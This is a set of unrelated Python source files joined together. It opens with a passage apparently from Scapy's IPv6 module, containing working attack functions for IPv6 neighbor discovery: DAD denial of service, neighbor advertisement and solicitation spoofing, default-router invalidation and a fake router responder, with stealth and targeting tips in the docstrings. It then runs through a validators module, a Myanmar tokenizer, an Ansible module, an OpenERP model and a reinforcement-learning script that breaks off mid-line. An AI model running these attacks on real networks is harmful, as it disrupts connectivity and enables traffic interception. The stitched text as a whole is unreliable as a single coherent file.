ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. """ def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt) sendp(rep, iface=iface, verbose=0) print "Reply NS for target address %s (received from %s)" % (tgt, mac) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. """ def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print "Reply NA for target address %s (received from %s)" % (tgt, mac) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = socket.inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print "solicited node multicast @ does not match target @!" return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src) rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print "Reply NA for target address %s (received from %s)" % (tgt, mac) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. """ if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print "Fake RA sent with source address %s" % src if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RS messages received from this source will trigger a reply. Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print "Fake RA sent in response to RS from %s" % src if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# ############################################################################# ### Layers binding ### ############################################################################# ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) bind_layers(Ether, IPv6, type = 0x86dd ) bind_layers(CookedLinux, IPv6, proto = 0x86dd ) bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP ) bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP ) bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP ) bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP ) bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 ) bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 ) bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
""" Validators check objects on asignment and do coercion if needed """ import datetime as dt import decimal class ValidationError(Exception): def __init__(self, message, class_=None, path=None, value=None, errors=None, *args, **kwargs): if errors is None: errors = [] self.errors = errors self.path = path or [] self.value = value self.class_ = class_ self.message = message super(ValidationError, self).__init__(*args, **kwargs) def __str__(self): clsname = self.class_.__name__ if self.class_ else '<No class>' path_display = ".".join([str(clsname)] + list(reversed(self.path))) return "Failed to validate {0} as {1}: {2}".format( self.value, path_display, self.message) def DummyValidator(data): "Passes through whatever comes to it" return data def SimpleTypeValidator(_type, error_classes=[ValueError]): def validator(data): error_msg = "Failed to validate as %s" % _type try: return _type(data) except tuple(error_classes) as e: raise ValidationError("{0}: {1}".format(error_msg, e)) except TypeError as e: raise ValidationError("{0}: {1}".format(error_msg, e)) return validator def StringValidator(data): if isinstance(data, str): return data raise ValidationError('Not a string') def StringIntValidator(data): if isinstance(data, str): return data if isinstance(data, int): return str(data) raise ValidationError('Not a string') def StringNumValidator(data): if isinstance(data, str): return data is_num = (isinstance(data, int) or isinstance(data, float)) if is_num: return str(data) raise ValidationError('Not a string') IntValidator = SimpleTypeValidator(int) def DecimalValidator(data): if isinstance(data, float): data = str(data) return SimpleTypeValidator( decimal.Decimal, [decimal.InvalidOperation, ValueError])(data) def CurrencyValidator(data): if not isinstance(data, str): raise ValidationError('Not a string') if len(data) != 3: raise ValidationError( 'Currency can contain two letters only [%s]' % data) return str(data) def DateTimeValidator(data): if isinstance(data, dt.datetime): return data if isinstance(data, str): try: return parse_datetime(data) except ValueError as e: raise ValidationError('Not a datetime [%s, %s]' % (data, e,)) raise ValidationError('Not a datetime [%s]' % data) def DateValidator(data): if isinstance(data, dt.datetime): return data.date() if isinstance(data, dt.date): return data if isinstance(data, str): try: return parse_date(data) except ValueError as e: raise ValidationError('Not a date [%s, %s]' % (data, e,)) raise ValidationError('Not a date [%s]' % data) def TimeValidator(data): if isinstance(data, dt.time): return data if isinstance(data, str): try: return parse_time(data) except ValueError as e: raise ValidationError('Not a time [%s, %s]' % (data, e,)) raise ValidationError('Not a time [%s]' % data) def TimeStampValidator(data): if isinstance(data, (int, float)): try: return dt.datetime.fromtimestamp(data) except (ValueError, TypeError) as exc: raise ValidationError('Not a timestamp [%s, %s]' % (data, exc,)) elif isinstance(data, str): try: return dt.datetime.fromtimestamp(float(data)) except (ValueError, TypeError) as exc: raise ValidationError('Not a timestamp [%s, %s]' % (data, exc,)) elif isinstance(data, dt.datetime): return data raise ValidationError('Not a timestamp [%s]' % data) def parse_datetime(s): parts = s.split('T') if len(parts) == 2: time_str = parts[1] if time_str[-1] == 'Z': time_str = time_str[:-1] return dt.datetime.combine(parse_date(parts[0]), parse_time(time_str)) raise ValueError('Invalid datetime format') def parse_date(s): parts = s.split('-') if len(parts) == 3: return dt.date(int(parts[0]), int(parts[1]), int(parts[2])) raise ValueError('Invalid date format') def parse_time(s): parts = s.split(':') if len(parts) >= 2: s = 0 mcs = 0 if len(parts) == 3: mparts = parts[2].split('.') s = int(mparts[0]) if len(mparts) > 1: mcs = int(mparts[1]) return dt.time(int(parts[0]), int(parts[1]), s, mcs) raise ValueError('Invalid time format')
#!/usr/bin/env python # -*- coding: utf-8 -*- ## Copyright Zeta Co., Ltd. ## written by @moeseth based on research by @aye_hnin_khine import re import wa_zero_fixer SAFE_DELIMITER = u"\uFFFF" def tokenize(input_string=None): if type(input_string) is not unicode: input_string = unicode(input_string, "utf8") input_string = wa_zero_fixer.fix(input_string=input_string) input_string = input_string.strip() input_string = re.sub(r"\n", u"\u0020", input_string) ## remove zero width space and zero width non-joiner input_string = re.sub(ur"[\u200B\u200C]", "", input_string) ## only remove all the *spaces* between myanmar words ## use positive lookahead to matches \s that is followed by a [\u1000-\u104F], without making the [\u1000-\u104F] part of the match input_string = re.sub(ur"([\u1000-\u104F])\s+(?=[\u1000-\u104F])", ur"\1", input_string) ## add a space between digits and non digits and non dot and non comma input_string = re.sub(ur"([^\u1040-\u1049\u002E\u002C])([\u1040-\u1049])", ur"\1`\2", input_string) input_string = re.sub(ur"([\u1040-\u1049])([^\u1040-\u1049\u002E\u002C])", ur"\1`\2", input_string) ## tokenize ။ and ၊ input_string = re.sub(ur"(\u104A|\u104B)", ur"`\1`", input_string) ## auk ka mit and a tat reordering input_string = re.sub(ur"\u103A\u1037", ur"\u1037\u103A", input_string) input_string = re.sub(ur"([\u1000-\u102A\u103F\u104C-\u104F])", ur'`\1', input_string) input_string = re.sub(ur"`([\u1000-\u1021])([\u1039\u103A])", ur'\1\2', input_string) input_string = re.sub(ur"`([\u1000-\u1021])([\u1037\u103A])", ur'\1\2', input_string) input_string = re.sub(ur"([\u1039])`([\u1000-\u1021])", ur'\1\2', input_string) input_string = re.sub(ur"([\u1000-\u103F\u104C-\u104F])([!-\u00D7\u1040-\u104B\u2018-\u201D])", ur'\1`\2', input_string) input_string = re.sub(u"\u0020", "`", input_string) input_string = input_string.replace("``", "`") ## remove ` at the start of the input_string input_string = re.sub(ur"^`", "", input_string) input_string = input_string.replace("`", SAFE_DELIMITER) return input_string def get_tokens(input_string=None): token_string = tokenize(input_string=input_string) tokens = token_string.split(SAFE_DELIMITER) return tokens def get_tokens_count(input_string=None): tokens = get_tokens(input_string=input_string) return len(tokens)
#!/usr/bin/python # # Created on Aug 25, 2016 # @author: Gaurav Rastogi ([email protected]) # Eric Anderson ([email protected]) # module_check: supported # # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: avi_prioritylabels author: Gaurav Rastogi ([email protected]) short_description: Module for setup of PriorityLabels Avi RESTful Object description: - This module is used to configure PriorityLabels object - more examples at U(https://github.com/avinetworks/devops) requirements: [ avisdk ] version_added: "2.4" options: state: description: - The state that should be applied on the entity. default: present choices: ["absent", "present"] avi_api_update_method: description: - Default method for object update is HTTP PUT. - Setting to patch will override that behavior to use HTTP PATCH. version_added: "2.5" default: put choices: ["put", "patch"] avi_api_patch_op: description: - Patch operation to use when using avi_api_update_method as patch. version_added: "2.5" choices: ["add", "replace", "delete"] cloud_ref: description: - It is a reference to an object of type cloud. description: description: - A description of the priority labels. equivalent_labels: description: - Equivalent priority labels in descending order. name: description: - The name of the priority labels. required: true tenant_ref: description: - It is a reference to an object of type tenant. url: description: - Avi controller URL of the object. uuid: description: - Uuid of the priority labels. extends_documentation_fragment: - avi ''' EXAMPLES = """ - name: Example to create PriorityLabels object avi_prioritylabels: controller: 10.10.25.42 username: admin password: something state: present name: sample_prioritylabels """ RETURN = ''' obj: description: PriorityLabels (api/prioritylabels) object returned: success, changed type: dict ''' from ansible.module_utils.basic import AnsibleModule try: from ansible.module_utils.network.avi.avi import ( avi_common_argument_spec, HAS_AVI, avi_ansible_api) except ImportError: HAS_AVI = False def main(): argument_specs = dict( state=dict(default='present', choices=['absent', 'present']), avi_api_update_method=dict(default='put', choices=['put', 'patch']), avi_api_patch_op=dict(choices=['add', 'replace', 'delete']), cloud_ref=dict(type='str',), description=dict(type='str',), equivalent_labels=dict(type='list',), name=dict(type='str', required=True), tenant_ref=dict(type='str',), url=dict(type='str',), uuid=dict(type='str',), ) argument_specs.update(avi_common_argument_spec()) module = AnsibleModule( argument_spec=argument_specs, supports_check_mode=True) if not HAS_AVI: return module.fail_json(msg=( 'Avi python API SDK (avisdk>=17.1) is not installed. ' 'For more details visit https://github.com/avinetworks/sdk.')) return avi_ansible_api(module, 'prioritylabels', set([])) if __name__ == '__main__': main()
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # Copyright (C) 2011-2013 Serpent Consulting Services Pvt. Ltd. (<http://serpentcs.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv import time from openerp import netsvc, tools from openerp.tools.translate import _ class table_area(osv.osv): _name = 'table.area' _columns = { 'name': fields.char('Area Description', required=True, size=64), 'table_ids': fields.one2many('table.table','area_id','Tables'), #Fields added to set times for tables 'open_timer': fields.integer('Open'), 'just_seated_timer': fields.integer('Just Seated'), 'order_taken_timer': fields.integer('Order Taken'), 'served_timer': fields.integer('Served'), 'check_timer': fields.integer('Check'), 'paid_timer': fields.integer('Paid'), } class table_table(osv.osv): _name = 'table.table' _columns = { 'name': fields.char('Description', required=True, size=64, select=1), 'code': fields.char('Code', size=64, required=True), 'number_of_seats':fields.integer('Number of seats'), 'max_number_of_seats':fields.integer('Maximum number of seats'), #To reserve a table there must be a wizard to specify who is going to come. Maybe a res-partner? #Also there must be a registry to log who is the one whom reserved the table (res.user) #The state of the table is going to change all the time. 'state':fields.selection([('open','Open'), ('just_seated','Just Seated'), ('order_taken','Order Taken'), ('served','Served'), ('check','Check'), ('paid','Paid')], 'State', required=True), 'users_ids':fields.many2many('res.users', 'rel_table_table_users_rel', 'table_id', 'user_id', 'Users'), 'order_ids':fields.many2many('pos.order', 'table_pos_order_rel', 'table_id', 'order_id', 'Orders'), 'area_id': fields.many2one('table.area','Area', required=True), 'only_free_state': fields.boolean('Only Free State'), #These fields intend to store position of the tables on the interface 'col': fields.integer('Grid Col'), 'row': fields.integer('Grid Row'), 'size_x': fields.integer('Grid Size X'), 'size_y': fields.integer('Grid Size Y'), 'sector': fields.char('Sector', size=64), } _defaults = { 'state':'open', } def set_table_position(self, cr, uid, table_data): self.write(cr, uid, table_data.get('widget_id'), {'col': table_data.get('col'), 'row': table_data.get('row'), 'size_x': table_data.get('size_x'), 'size_y': table_data.get('size_y')}) return True def write(self, cr, uid, ids, vals, context=None): if context is None: context = {} if not ids: return True if vals.get('state'): if not isinstance(ids, list): ids = [ids] for table in self.browse(cr, uid, ids): if table.only_free_state: super(table_table, self).write(cr, uid, table.id, {'state': 'open'}, context=context) ids.remove(table.id) else: order_pool = self.pool.get('pos.order') order_ids = order_pool.search(cr, uid, ['&',('table_ids','in',ids),('state','=','draft')]) order_pool.write(cr, uid, order_ids, {'state_log': [[0,0,{'state': vals.get('state')}]]}) if ids: return super(table_table, self).write(cr, uid, ids, vals, context=context) else: return True class table_user(osv.osv): _inherit ='res.users' _columns = { 'table_ids':fields.many2many('table.table', 'rel_table_table_users_rel', 'user_id', 'table_id', 'Tables'), }
import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import numpy as np from tqdm import tqdm, trange from mushroom_rl.core import Core from mushroom_rl.environments import Gym from mushroom_rl.algorithms.actor_critic import TRPO, PPO from mushroom_rl.policy import GaussianTorchPolicy from mushroom_rl.utils.dataset import compute_J class Network(nn.Module): def __init__(self, input_shape, output_shape, n_features, **kwargs): super(Network, self).__init__() n_input = input_shape[-1] n_output = output_shape[0] self._h1 = nn.Linear(n_input, n_features) self._h2 = nn.Linear(n_features, n_features) self._h3 = nn.Linear(n_features, n_output) nn.init.xavier_uniform_(self._h1.weight, gain=nn.init.calculate_gain('relu')) nn.init.xavier_uniform_(self._h2.weight, gain=nn.init.calculate_gain('relu')) nn.init.xavier_uniform_(self._h3.weight, gain=nn.init.calculate_gain('linear')) def forward(self, state, **kwargs): features1 = F.relu(self._h1(torch.squeeze(state, 1).float())) features2 = F.relu(self._h2(features1)) a = self._h3(features2) return a def experiment(alg, env_id, horizon, gamma, n_epochs, n_steps, n_steps_per_fit, n_episodes_test, alg_params, policy_params): print(alg.__name__) mdp = Gym(env_id, horizon, gamma) critic_params = dict(network=Network, optimizer={'class': optim.Adam, 'params': {'lr': 3e-4}}, loss=F.mse_loss, n_features=32, batch_size=64, input_shape=mdp.info.observation_space.shape, output_shape=(1,)) policy = GaussianTorchPolicy(Network, mdp.info.observation_space.shape, mdp.info.action_space.shape, **policy_params) alg_params['critic_params'] = critic_params agent = alg(mdp.info, policy, **alg_params) core = Core(agent, mdp) dataset = core.evaluate(n_episodes=n_episodes_test, render=False) J = np.mean(compute_J(dataset, mdp.info.gamma)) R = np.mean(compute_J(dataset)) E = agent.policy.entropy() tqdm.write('END OF EPOCH 0') tqdm.write('J: {}, R: {}, entropy: {}'.format(J, R, E)) tqdm.write('##################################################################################################') for it in 